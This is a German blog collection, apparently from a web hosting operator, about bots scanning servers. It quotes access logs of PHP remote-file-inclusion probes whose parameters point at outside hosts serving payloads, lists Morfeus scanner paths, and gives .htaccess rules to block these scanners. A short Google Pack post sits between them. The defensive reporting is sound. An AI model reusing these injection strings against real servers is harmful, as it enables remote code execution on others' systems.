Es scheint wirklich groß in Mode zu sein, mit automatisierten Skripts Schwachstellen auf Webservern zu suchen. Falls hier bald nichts mehr antwortet, dann hat das was hiermit zu tun :

2007-04-19 22:27 unknown libwww-perl/5.65 nwns0001.nwwnet.net
2007-04-19 22:27 unknown libwww-perl/5.79 222.236.47.187
2007-04-19 22:27 unknown libwww-perl/5.803 203.85.114.102
2007-04-19 22:26 unknown libwww-perl/5.79 flex2532-001.flexservers. com
2007-04-19 22:26 unknown libwww-perl/5.805 psts.net.ua
2007-04-19 22:26 unknown libwww-perl/5.79 222.236.47.187
2007-04-19 22:25 unknown libwww-perl/5.79 flex2532-001.flexservers. com
2007-04-19 22:25 unknown libwww-perl/5.65 nwns0001.nwwnet.net
2007-04-19 22:25 unknown libwww-perl/5.65 ns3.rosehosting.com
2007-04-19 22:25 unknown libwww-perl/5.79 59-125-93-22.HINET-IP.hin et.net
2007-04-19 22:25 unknown libwww-perl/5.805 smile.vanleuven.com
2007-04-19 22:24 unknown libwww-perl/5.65 nwns0001.nwwnet.net

65.123.73.11 - - [19/Apr/2007:22:24:59 +0200] "GET //naboard//naboard_pnr.php?skin=http://212.191.87.139/solo/cat.c? HTTP/1.1" 404 163485 "-" "libwww-perl/5.65"
217.78.242.26 - - [19/Apr/2007:22:25:00 +0200] "GET //naboard//naboard_pnr.php?skin=http://212.191.87.139/solo/cat.c? HTTP/1.1" 404 163863 "-" "libwww-perl/5.805"
59.125.93.22 - - [19/Apr/2007:22:25:07 +0200] "GET //naboard//naboard_pnr.php?skin=http://212.191.87.139/solo/cat.c? HTTP/1.1" 404 163485 "-" "libwww-perl/5.79"
209.135.140.145 - - [19/Apr/2007:22:25:18 +0200] "GET //naboard//naboard_pnr.php?skin=http://212.191.87.139/solo/cat.c? HTTP/1.1" 404 163499 "-" "libwww-perl/5.65"
65.123.73.11 - - [19/Apr/2007:22:25:19 +0200] "GET //naboard//naboard_pnr.php?skin=http://212.191.87.139/solo/cat.c? HTTP/1.1" 404 163491 "-" "libwww-perl/5.65"
89.255.3.4 - - [19/Apr/2007:22:25:51 +0200] "GET //naboard//naboard_pnr.php?skin=http://212.191.87.139/solo/cat.c? HTTP/1.1" 404 163492 "-" "libwww-perl/5.79"
222.236.47.187 - - [19/Apr/2007:22:26:03 +0200] "GET //naboard//naboard_pnr.php?skin=http://212.191.87.139/solo/cat.c? HTTP/1.1" 404 163576 "-" "libwww-perl/5.79"

Da probiert gerade ein Bot hier auf dem Server Schwachstellen zu finden.
siehe hier

Update: Jemand hat danach gesucht wie man den User-Agent libwww-perl aussperren kann:

RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} ^libwww-perl
RewriteRule ^.*$ - [F]

in die .htaccess eintragen.

In einem Shop unserer Kunden versucht nun schon seit einer Stunde jemand einen (scheinbar) neuen Exploit untertzbringen.

Es werden immer Seiten nach dem Muster /index.php/cat/index.php?cat=1&page=http://62.129.173.149/img/dog.c? versucht aufzurufen. Mein Kaspersky rät davon ab die Seite http://62.129.173.149/img/dog.c? aufzurufen, um zu gucken was sich dahinter verbirgt Ist ja auch nicht so wichtig. Ich nehme vorsorglich mal die 62.129.173.149 in die Liste der verbotenen Hosts mit auf. Die Zugriffe selber kamen allerdings von verschiedenen Adressen im 200er IP Adressbereich, so dass man davon ausgehen darf, dass hier einige Bots infizierbare Seiten abgrasen.

65.75.134.50 - - "GET /index.php/cat/index.php?cat=&page=http://62.129.173.149/img/dog.c? HTTP/1.1" 200 19468 "-" "libwww-perl/5.805"
85.214.41.173 - - "GET /index.php/cat/index.php?cat=&page=http://62.129.173.149/img/dog.c? HTTP/1.1" 200 19473 "-" "libwww-perl/5.803"
200.72.22.114 - - "GET /index.php/cat/index.php?cat=1&page=http://62.129.173.149/img/dog.c? HTTP/1.1" 200 19471 "-" "libwww-perl/5.800"
213.201.4.83 - - "GET /index.php/cat/index.php?cat=1&page=http://62.129.173.149/img/dog.c? HTTP/1.1" 200 19463 "-" "libwww-perl/5.805"
85.19.150.85 - - "GET /index.php/cat/index.php?cat=&page=http://62.129.173.149/img/dog.c? HTTP/1.1" 200 19216 "-" "libwww-perl/5.805"

Naja... Viel Spaß noch

Ob mein deny from 62.129.173.149 in der .htaccess wirklich etwas bringt?

Für mich gehört ja das Google Pack auf jeden neuen PC mit drauf, weil es Gratis-Software bietet, die man gut brauchen kann.

Offensichtlich hat Google die Inhalte des Google-Packs aktualisiert, denn als ich gerade durch mein Adsense stöberte, um wie Dagobert Duck meine Reichtümer zu ordnen, habe ich mindestens 2 neue Tools im Google-Pack entdeckt:

Norton Security Scan - Sicherheitsdienstprogramm

Erkennt und entfernt Viren und Internet-Würmer
Kostenlose Updates und regelmäßige Scans


Spyware Doctorâ„¢ Startversion - Anti-Spyware-Programm

Erkennt und entfernt Spyware, Adware, Trojaner und Keylogger
Schützt Ihren PC mit Hilfe von Smart Updates und Zeitplänen

Also, bei Bedarf mal downloaden:

English Version here.

Heute haben wir in den Logfiles eines unserer Kunden Hunderte Einträge eines Useragenten "Morfeus Fucking Scanner" entdeckt. Der hat zwischen 04:33 und 04:45 Uhr ca. 400 verschiedene Files versucht aufzurufen, um Sicherheitslücken oder alte (oder auch vergessene) Skripts auf dem Server zu finden.

Das scheint ein automatisches Skript zu sein, das einfach auf Verdacht Hunderte Dateinamen aufruft und guckt, ob etwas antwortet. Einige Beispiele:

/portal/index.php?file_name[]=http://203.198.68.236/~lisir/M.txt?&/
/board/naboard_pnr.php?skin=http://203.198.68.236/~lisir/M.txt?&/
/revista/estilo/discreet/index.php?adodb=http://203.198.68.236/~lisir/M.txt?&/
/components/com_performs/performs.php?mosConfig_absolute_path=http://203.198.68.236/~lisir/M.txt?&/
/redaxo/include/addons/simple_user/pages/index.inc.php?REX[INCLUDE_PATH]=http://203.198.68.236/~lisir/M.txt?&/
/jetboxincludes/phpdig/includes/config.php?relative_script_path=http://203.198.68.236/~lisir/M.txt?&/
/phpnuke/modules/vWar_Account/includes/functions_common.php?vwar_root2=http://203.198.68.236/~lisir/M.txt?&/


Die "Angriffe" kamen alle von der IP: 208.67.180.44 und wer den Useragenten aussperren will: HTTP_USER_AGENT: Morfeus Fucking Scanner

Mit diesen Zeilen in der .htaccess lässt sich der Scanner vom Server aussperren:

RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} ^Morfeus
RewriteRule ^.*$ - [F]

Wenn dir dieser Artikel geholfen hat, dann darfst du gerne ein paar Cent in unsere Kaffeekasse spenden.